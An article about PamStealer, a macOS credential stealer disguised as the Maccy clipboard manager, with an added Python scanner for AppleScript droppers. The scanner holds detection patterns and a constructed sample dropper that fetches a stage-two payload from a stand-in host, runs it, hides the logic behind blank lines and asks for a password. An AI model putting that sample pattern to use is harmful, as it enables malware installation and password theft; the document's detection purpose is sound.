Researchers Discover Novel macOS Malware with Custom Credential Stealing Code
Researchers have identified a previously undocumented piece of macOS malware, dubbed PamStealer, that uses sophisticated tradecraft to infect Macs with custom-developed credential-stealing code. The malware operates in two stages: a first-stage dropper and a second-stage payload.
Delivery and Execution Chain
The malware is distributed as a disk image posing as Maccy, a clipboard manager for Macs. The first stage is written in AppleScript and reaches native Objective-C APIs through the AppleScript-ObjC bridge to download and execute the second-stage payload.
Stealth Measures and Password Validation
The malware employs unusual techniques for stealth. Double-clicking the first-stage file opens the AppleScript in the macOS Script Editor, where the malicious functionality is concealed from the user viewing the script. The malware also validates the login password it collects before sending it to an attacker-controlled server, so only a password that actually works is exfiltrated.
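The delivery chain and the stealth measures described in the two sections above can be triaged from the script source. The following scanner is an added example written for this page; it is not the researchers' tooling and not code from the malware. It assumes the AppleScript reaches Objective-C through the usual AppleScriptObjC idioms (`use framework`, `current application's NS...`), looks for download, write-to-disk, execute and hidden-answer password-prompt indicators, and measures how far the first indicator sits below the benign-looking top of the script (a long run of blank lines is one way code ends up out of view in Script Editor; that specific trick is an assumption, not a detail from the report). Compiled `.scpt` files are binary, so on macOS decompile first with `osadecompile dropper.scpt` and feed the text in. The sample scripts inside the block are constructed for the demo.

```python
"""Heuristic triage of an AppleScript dropper source (added example, not from the report)."""
import re
from dataclasses import dataclass, field

# Indicator regexes grouped by the stage of the chain each suggests. The
# AppleScriptObjC idioms are an assumption about how the "native Objective-C
# APIs" mentioned in the report are reached from AppleScript.
INDICATORS = {
    "objc_bridge": re.compile(r'''use framework "\w+"|current application's NS\w+'''),
    "download": re.compile(r"dataWithContentsOfURL|NSURLSession|NSMutableURLRequest|\bcurl\b"),
    "write_to_disk": re.compile(r"writeToFile:|NSFileManager"),
    "execute": re.compile(r"do shell script|NSTask|chmod\s+\+x"),
    "password_prompt": re.compile(r"display dialog[^\n]*with hidden answer"),
}


@dataclass
class Finding:
    hits: dict = field(default_factory=dict)  # indicator name -> first matching line (1-based)
    padding_run: int = 0                      # longest run of blank lines before the first hit
    hidden_by_padding: bool = False           # True when that run exceeds the threshold
    verdict: str = "clean"                    # "clean", "review" or "download-and-execute"


def scan_source(src: str, padding_threshold: int = 30) -> Finding:
    """Scan decompiled AppleScript text and return a Finding."""
    lines = src.splitlines()
    f = Finding()
    for n, line in enumerate(lines, 1):
        for name, pat in INDICATORS.items():
            if name not in f.hits and pat.search(line):
                f.hits[name] = n
    if not f.hits:
        return f
    # How far below the visible top of the script does the first indicator sit?
    first = min(f.hits.values())
    run = 0
    for line in lines[: first - 1]:
        run = run + 1 if not line.strip() else 0
        f.padding_run = max(f.padding_run, run)
    f.hidden_by_padding = f.padding_run >= padding_threshold
    # Download plus execute in one script is the dropper pattern described above.
    if {"download", "execute"}.issubset(f.hits):
        f.verdict = "download-and-execute"
    else:
        f.verdict = "review"
    return f


def scan_file(path: str) -> Finding:
    """Scan a decompiled (text) AppleScript file from disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_source(fh.read())


# Constructed samples (not real malware): a lure the user sees at the top of
# Script Editor, 200 blank lines, then the dropper logic and a password prompt.
SAMPLE_LURE = 'display dialog "Maccy needs to finish installing. Click OK." buttons {"OK"}\n'
SAMPLE_HIDDEN = (
    'use framework "Foundation"\n'
    "set payloadURL to current application's NSURL's URLWithString:\"https://example.invalid/stage2\"\n"
    "set payload to current application's NSData's dataWithContentsOfURL:payloadURL\n"
    "payload's writeToFile:\"/tmp/.stage2\" atomically:true\n"
    'do shell script "chmod +x /tmp/.stage2; /tmp/.stage2 &"\n'
    'set pw to text returned of (display dialog "Enter your password" default answer "" with hidden answer)\n'
)
SAMPLE_DROPPER = SAMPLE_LURE + "\n" * 200 + SAMPLE_HIDDEN
SAMPLE_BENIGN = 'tell application "Finder"\n\tactivate\nend tell\n'

if __name__ == "__main__":
    for label, sample in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        r = scan_source(sample)
        print(f"{label}: verdict={r.verdict} hits={r.hits} "
              f"padding_run={r.padding_run} hidden={r.hidden_by_padding}")
```

The padding measurement is the part worth keeping even if the indicator list changes: a script whose first suspicious call appears only after dozens of empty lines is itself a signal, independent of which API it eventually calls.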
Conclusion
PamStealer combines a recently emerging delivery surface, an AppleScript dropper shipped in a disk image, with a less familiar payload, showing how commodity macOS stealers are evolving towards quieter execution chains and native implementations.